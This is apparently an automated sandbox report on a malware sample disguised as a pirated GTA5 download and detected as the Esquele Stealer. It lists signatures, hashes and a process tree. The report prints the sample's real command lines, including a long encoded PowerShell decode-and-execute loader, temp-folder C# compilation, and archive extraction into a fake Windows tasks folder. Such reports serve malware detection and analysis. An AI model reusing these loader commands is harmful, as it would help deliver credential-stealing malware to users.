Edit tour

Windows Analysis Report
GTA5-elamigos.exe

Overview

General Information

Sample name:	GTA5-elamigos.exe
Analysis ID:	1585597
MD5:	b885bdba1ae235bef39832702abc5b03
SHA1:	c42955695575c35d23f6a5e1fb3808b2bc23f74e
SHA256:	90a4107e2851d7e178995e2ecbeef51c0390991e4ed7473e253dcb81a8c5f3a9
Tags:	BootkitEsqueleStealerexeRansomwareRatSpywareStealeruser-SuiHunter
Infos:

Detection

Esquele Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Yara detected Esquele Stealer

Yara detected Powershell decode and execute

Encrypted powershell cmdline option found

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Powershell drops PE file

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious PowerShell Parameter Substring

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Execution of Powershell with Base64

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

GTA5-elamigos.exe (PID: 6136 cmdline: "C:\Users\user\Desktop\GTA5-elamigos.exe" MD5: B885BDBA1AE235BEF39832702ABC5B03)

conhost.exe (PID: 3624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2860 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGwATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAEoARwBoAFgAYgBtAFEAcwBJAEQAQQBwAEQAUQBwADkARABRAG8AawBZADMAVgB5AGMAbQBWAHUAZABGAGQAcABiAG0AUgB2AGQAMQBSAHAAZABHAHgAbABJAEQAMABnAFIAMgBWADAAUQBXAE4AMABhAFgAWgBsAFYAMgBsAHUAWgBHADkAMwBWAEcAbAAwAGIARwBVAE4AQwBrAGgAcABaAEcAVgBCAFkAMwBSAHAAZABtAFYAWABhAFcANQBrAGIAMwBjAE4AQwBnAD0APQAiAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgBTAGMAcgBpAHAAdAApACkAIAB8ACAAaQBlAHgA MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 6420 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 6052 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE4C.tmp" "c:\Users\user\AppData\Local\Temp\14ynqbdy\CSC1857152425CA4EAA8346B0B93220CD75.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

powershell.exe (PID: 6784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGwATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAEoARwBoAFgAYgBtAFEAcwBJAEQAQQBwAEQAUQBwADkARABRAG8AawBZADMAVgB5AGMAbQBWAHUAZABGAGQAcABiAG0AUgB2AGQAMQBSAHAAZABHAHgAbABJAEQAMABnAFIAMgBWADAAUQBXAE4AMABhAFgAWgBsAFYAMgBsAHUAWgBHADkAMwBWAEcAbAAwAGIARwBVAE4AQwBrAGgAcABaAEcAVgBCAFkAMwBSAHAAZABtAFYAWABhAFcANQBrAGIAMwBjAE4AQwBnAD0APQAiAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgBTAGMAcgBpAHAAdAApACkAIAB8ACAAaQBlAHgA MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 6412 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jmxyvs0r\jmxyvs0r.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 6196 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES12D9.tmp" "c:\Users\user\AppData\Local\Temp\jmxyvs0r\CSC50638E4E3C724DF29F41E118778681D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

WMIC.exe (PID: 3812 cmdline: "wmic" csproduct get uuid /value MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

powershell.exe (PID: 5136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path \"C:\WindowsTasks\Updates\Update-m876kK3CBP.zip\" -DestinationPath \"C:\WindowsTasks\Platform\App-rRrqar5TwQ\" MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.2040181571.0000024F2047C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
00000000.00000003.2186944875.0000024F20585000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
00000000.00000003.2190655984.0000024F20585000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
00000000.00000003.2186572194.0000024F20454000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
00000000.00000003.2187457928.0000024F20585000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
00000000.00000003.2193159338.0000024F20585000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
00000000.00000003.2043784374.0000024F2047C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
00000000.00000003.2042780701.0000024F2047C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
00000000.00000003.2189549532.0000024F20585000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
00000000.00000003.2187591917.0000024F20585000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
00000000.00000003.2187294963.0000024F20454000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
00000000.00000003.2041506674.0000024F2047C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
00000000.00000003.2187177452.0000024F20454000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
00000000.00000003.2192321844.0000024F20585000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
00000000.00000003.2191437630.0000024F20585000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
00000000.00000003.2046992835.0000024F20469000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
00000000.00000003.2337536086.0000024F20585000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
Process Memory Space: GTA5-elamigos.exe PID: 6136	JoeSecurity_EsqueleStealer	Yara detected Esquele Stealer	Joe Security
Process Memory Space: powershell.exe PID: 2860	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x224b58:$b2: ::FromBase64String( 0x224b37:$b3: ::UTF8.GetString( 0x1b32a:$s1: -join 0x28d29:$s1: -join 0x2a8ee:$s1: -join 0x2aa7a:$s1: -join 0x2ee53:$s1: -join 0xb7cd5:$s1: -join 0xbc5db:$s1: -join 0xe2eb2:$s1: -join 0xe3612:$s1: -join 0x119e1d:$s1: -join 0x119e58:$s1: -join 0x119f12:$s1: -join 0x119f40:$s1: -join 0x11a0e5:$s1: -join 0x11a108:$s1: -join 0x11a3bc:$s1: -join 0x11a3dd:$s1: -join 0x11a40f:$s1: -join 0x11a457:$s1: -join
Process Memory Space: powershell.exe PID: 6784	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xf8525:$b2: ::FromBase64String( 0xf8504:$b3: ::UTF8.GetString( 0xe75e:$s1: -join 0x1035f:$s1: -join 0x104eb:$s1: -join 0x149bd:$s1: -join 0x52aee:$s1: -join 0x52b29:$s1: -join 0x52bea:$s1: -join 0x52c18:$s1: -join 0x52dbd:$s1: -join 0x52de0:$s1: -join 0x53094:$s1: -join 0x530b5:$s1: -join 0x530e7:$s1: -join 0x5312f:$s1: -join 0x5315c:$s1: -join 0x53183:$s1: -join 0x531b4:$s1: -join 0x531d6:$s1: -join 0x53245:$s1: -join
Click to see the 15 entries

Other

Source	Rule	Description	Author	Strings
amsi64_2860.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security
amsi64_6784.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMA